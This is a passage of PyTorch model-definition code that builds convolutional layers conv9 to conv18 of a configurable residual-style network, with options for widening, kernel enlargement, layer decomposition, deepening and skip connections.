                self.conv9_2 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv9_3 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[9] == 3:
                self.conv9_0 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv9_1 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[9] == 4:
                self.conv9_0 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv9_1 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv9_2 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv9_3 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv9 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv9 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[9] == 1:
                self.conv9_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[9] == 1:
                self.conv9_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=((params[2] - 1) // 2, (params[3] - 1) // 2))
        self.conv_bn9 = torch.nn.BatchNorm2d(params[1])
        # conv10: 16 -> 16 channels, 3x3 kernel, stride 1
        params = [16, 16, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[9] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[9] / 4) * 4)
            if self.widen_list[10] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[10] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[10] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[10])
                params[3] = params[3] + 2 * int(self.kerneladd_list[10])
                params[6] = params[6] + int(self.kerneladd_list[10])
                params[7] = params[7] + int(self.kerneladd_list[10])
        if self.decompo_list is not None:
            if self.decompo_list[10] == 1:
                self.conv10_0 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv10_1 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[10] == 2:
                self.conv10_0 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv10_1 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv10_2 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv10_3 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[10] == 3:
                self.conv10_0 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv10_1 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[10] == 4:
                self.conv10_0 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv10_1 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv10_2 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv10_3 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv10 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv10 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[10] == 1:
                self.conv10_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[10] == 1:
                self.conv10_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=((params[2] - 1) // 2, (params[3] - 1) // 2))
        self.conv_bn10 = torch.nn.BatchNorm2d(params[1])
        # conv11: 16 -> 32 channels, 3x3 kernel, stride 2 (downsampling)
        params = [16, 32, 3, 3, 2, 2, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[10] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[10] / 4) * 4)
            if self.widen_list[11] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[11] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[11] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[11])
                params[3] = params[3] + 2 * int(self.kerneladd_list[11])
                params[6] = params[6] + int(self.kerneladd_list[11])
                params[7] = params[7] + int(self.kerneladd_list[11])
        if self.decompo_list is not None:
            if self.decompo_list[11] == 1:
                self.conv11_0 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv11_1 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[11] == 2:
                self.conv11_0 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv11_1 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv11_2 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv11_3 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[11] == 3:
                self.conv11_0 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv11_1 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[11] == 4:
                self.conv11_0 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv11_1 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv11_2 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv11_3 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv11 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv11 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[11] == 1:
                self.conv11_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[11] == 1:
                self.conv11_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=((params[2] - 1) // 2, (params[3] - 1) // 2))
        self.conv_bn11 = torch.nn.BatchNorm2d(params[1])
        # conv12: 32 -> 32 channels, 3x3 kernel, stride 1
        params = [32, 32, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[11] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[11] / 4) * 4)
            if self.widen_list[12] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[12] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[12] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[12])
                params[3] = params[3] + 2 * int(self.kerneladd_list[12])
                params[6] = params[6] + int(self.kerneladd_list[12])
                params[7] = params[7] + int(self.kerneladd_list[12])
        if self.decompo_list is not None:
            if self.decompo_list[12] == 1:
                self.conv12_0 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv12_1 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[12] == 2:
                self.conv12_0 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv12_1 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv12_2 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv12_3 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[12] == 3:
                self.conv12_0 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv12_1 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[12] == 4:
                self.conv12_0 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv12_1 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv12_2 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv12_3 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv12 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv12 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[12] == 1:
                self.conv12_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[12] == 1:
                self.conv12_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=((params[2] - 1) // 2, (params[3] - 1) // 2))
        self.conv_bn12 = torch.nn.BatchNorm2d(params[1])
        # conv13: 16 -> 32 channels, 1x1 kernel, stride 2
        params = [16, 32, 1, 1, 2, 2, 0, 0]
        if self.widen_list is not None:
            if self.widen_list[12] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[12] / 4) * 4)
            if self.widen_list[13] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[13] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[13] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[13])
                params[3] = params[3] + 2 * int(self.kerneladd_list[13])
                params[6] = params[6] + int(self.kerneladd_list[13])
                params[7] = params[7] + int(self.kerneladd_list[13])
        if self.decompo_list is not None:
            if self.decompo_list[13] == 1:
                self.conv13_0 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv13_1 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[13] == 2:
                self.conv13_0 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv13_1 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv13_2 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv13_3 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[13] == 3:
                self.conv13_0 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv13_1 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[13] == 4:
                self.conv13_0 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv13_1 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv13_2 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv13_3 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv13 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv13 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[13] == 1:
                self.conv13_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[13] == 1:
                self.conv13_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=((params[2] - 1) // 2, (params[3] - 1) // 2))
        self.conv_bn13 = torch.nn.BatchNorm2d(params[1])
        # conv14: 32 -> 32 channels, 3x3 kernel, stride 1
        params = [32, 32, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[13] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[13] / 4) * 4)
            if self.widen_list[14] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[14] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[14] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[14])
                params[3] = params[3] + 2 * int(self.kerneladd_list[14])
                params[6] = params[6] + int(self.kerneladd_list[14])
                params[7] = params[7] + int(self.kerneladd_list[14])
        if self.decompo_list is not None:
            if self.decompo_list[14] == 1:
                self.conv14_0 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv14_1 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[14] == 2:
                self.conv14_0 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv14_1 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv14_2 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv14_3 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[14] == 3:
                self.conv14_0 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv14_1 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[14] == 4:
                self.conv14_0 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv14_1 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv14_2 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv14_3 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv14 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv14 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[14] == 1:
                self.conv14_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[14] == 1:
                self.conv14_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=((params[2] - 1) // 2, (params[3] - 1) // 2))
        self.conv_bn14 = torch.nn.BatchNorm2d(params[1])
        # conv15: 32 -> 32 channels, 3x3 kernel, stride 1
        params = [32, 32, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[14] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[14] / 4) * 4)
            if self.widen_list[15] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[15] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[15] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[15])
                params[3] = params[3] + 2 * int(self.kerneladd_list[15])
                params[6] = params[6] + int(self.kerneladd_list[15])
                params[7] = params[7] + int(self.kerneladd_list[15])
        if self.decompo_list is not None:
            if self.decompo_list[15] == 1:
                self.conv15_0 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv15_1 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[15] == 2:
                self.conv15_0 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv15_1 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv15_2 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv15_3 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[15] == 3:
                self.conv15_0 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv15_1 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[15] == 4:
                self.conv15_0 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv15_1 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv15_2 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv15_3 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv15 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv15 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[15] == 1:
                self.conv15_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[15] == 1:
                self.conv15_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=((params[2] - 1) // 2, (params[3] - 1) // 2))
        self.conv_bn15 = torch.nn.BatchNorm2d(params[1])
        # conv16: 32 -> 32 channels, 3x3 kernel, stride 1
        params = [32, 32, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[15] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[15] / 4) * 4)
            if self.widen_list[16] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[16] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[16] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[16])
                params[3] = params[3] + 2 * int(self.kerneladd_list[16])
                params[6] = params[6] + int(self.kerneladd_list[16])
                params[7] = params[7] + int(self.kerneladd_list[16])
        if self.decompo_list is not None:
            if self.decompo_list[16] == 1:
                self.conv16_0 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv16_1 = torch.nn.Conv2d(params[0], params[1] // 2, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[16] == 2:
                self.conv16_0 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv16_1 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv16_2 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv16_3 = torch.nn.Conv2d(params[0], params[1] // 4, (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[16] == 3:
                self.conv16_0 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv16_1 = torch.nn.Conv2d(params[0] // 2, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[16] == 4:
                self.conv16_0 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv16_1 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv16_2 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv16_3 = torch.nn.Conv2d(params[0] // 4, params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv16 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv16 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[16] == 1:
                self.conv16_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[16] == 1:
                self.conv16_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=((params[2] - 1) // 2, (params[3] - 1) // 2))
        self.conv_bn16 = torch.nn.BatchNorm2d(params[1])
        # conv17 block: 3x3 conv, 32 -> 32 channels, stride 1
        params = [32, 32, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[16] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[16] / 4) * 4)
            if self.widen_list[17] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[17] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[17] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[17])
                params[3] = params[3] + 2 * int(self.kerneladd_list[17])
                params[6] = params[6] + int(self.kerneladd_list[17])
                params[7] = params[7] + int(self.kerneladd_list[17])
        if self.decompo_list is not None:
            if self.decompo_list[17] == 1:
                self.conv17_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv17_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[17] == 2:
                self.conv17_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv17_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv17_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv17_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[17] == 3:
                self.conv17_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv17_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[17] == 4:
                self.conv17_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv17_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv17_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv17_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv17 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv17 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[17] == 1:
                self.conv17_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[17] == 1:
                self.conv17_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
        self.conv_bn17 = torch.nn.BatchNorm2d(params[1])
        # conv18 block: 3x3 conv, 32 -> 32 channels, stride 1
        params = [32, 32, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[17] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[17] / 4) * 4)
            if self.widen_list[18] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[18] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[18] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[18])
                params[3] = params[3] + 2 * int(self.kerneladd_list[18])
                params[6] = params[6] + int(self.kerneladd_list[18])
                params[7] = params[7] + int(self.kerneladd_list[18])
        if self.decompo_list is not None:
            if self.decompo_list[18] == 1:
                self.conv18_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv18_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[18] == 2:
                self.conv18_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv18_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv18_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv18_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[18] == 3:
                self.conv18_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
